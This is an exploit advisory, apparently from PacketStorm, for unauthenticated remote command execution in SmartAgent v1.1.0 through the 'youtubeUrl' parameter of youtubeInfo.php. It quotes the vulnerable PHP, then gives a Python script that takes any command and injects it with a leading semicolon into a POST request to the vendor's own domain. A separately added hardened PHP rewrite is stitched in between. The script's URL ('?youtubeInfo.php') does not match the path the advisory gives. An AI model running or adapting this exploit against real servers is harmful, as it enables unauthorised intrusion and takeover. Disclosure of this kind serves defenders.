## https://sploitus.com/exploit?id=PACKETSTORM:182451
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can reach the PHP script https://smarts-srlcom.com/youtubeInfo.php in the vulnerable web application. A POST request to it with the vulnerable parameter "youtubeUrl" can trigger a command injection vulnerability, because the parameter value is concatenated into a shell command without any sanitization.  
  
Vulnerable code snippet from youtubeInfo.php:  
"""  
$youtubeUrl=$_POST["youtubeUrl"];  
$command = 'youtube-dl -j ' . $youtubeUrl;  
echo shell_exec($command);  
"""  
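
A hardened counterpart to the snippet above, as an added example that is not part of the original advisory or the vendor's code: it validates "youtubeUrl" against a host allow-list and runs youtube-dl without a shell. The function names, the allow-listed hosts, the error responses and the Linux `/dev/null` path are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumptions: Linux host, PHP >= 7.4,
// youtube-dl on PATH, and only the YouTube hosts listed below are legitimate.

function validate_youtube_url(string $raw): ?string
{
    $raw = trim($raw);
    if (filter_var($raw, FILTER_VALIDATE_URL) === false) {
        return null;                       // not an absolute URL at all
    }
    $parts  = parse_url($raw);
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    $allowed = ['youtube.com', 'www.youtube.com', 'm.youtube.com', 'youtu.be'];
    if ($scheme !== 'https' || !in_array($host, $allowed, true)) {
        return null;                       // wrong scheme or host not allow-listed
    }
    return $raw;
}

function fetch_video_info(string $url): ?string
{
    // Array form of proc_open() executes youtube-dl directly: no shell ever
    // parses $url, so ";", "|", "$()" and backticks are plain argument bytes.
    // "--" ends option parsing, so the value cannot be read as a switch.
    $argv = ['youtube-dl', '-j', '--', $url];
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return proc_close($proc) === 0 ? $out : null;
}

$raw = $_POST['youtubeUrl'] ?? '';
$url = is_string($raw) ? validate_youtube_url($raw) : null;  // rejects youtubeUrl[]=
if ($url === null) {
    http_response_code(400);
    exit('invalid youtubeUrl');
}
$info = fetch_video_info($url);
if ($info === null) {
    http_response_code(502);
    exit('lookup failed');
}
header('Content-Type: application/json');
echo $info;
```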
  
  
Steps To Reproduce:  
1. Run the Python script below against a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smarts-srlcom.com?youtubeInfo.php"  
command = input("Enter the command you want to run (EX: id): ")  
  
postdata = {  
"youtubeUrl": ";" + command  
}  
  
response = requests.post(url, data=postdata, verify=False)  
print(response.text)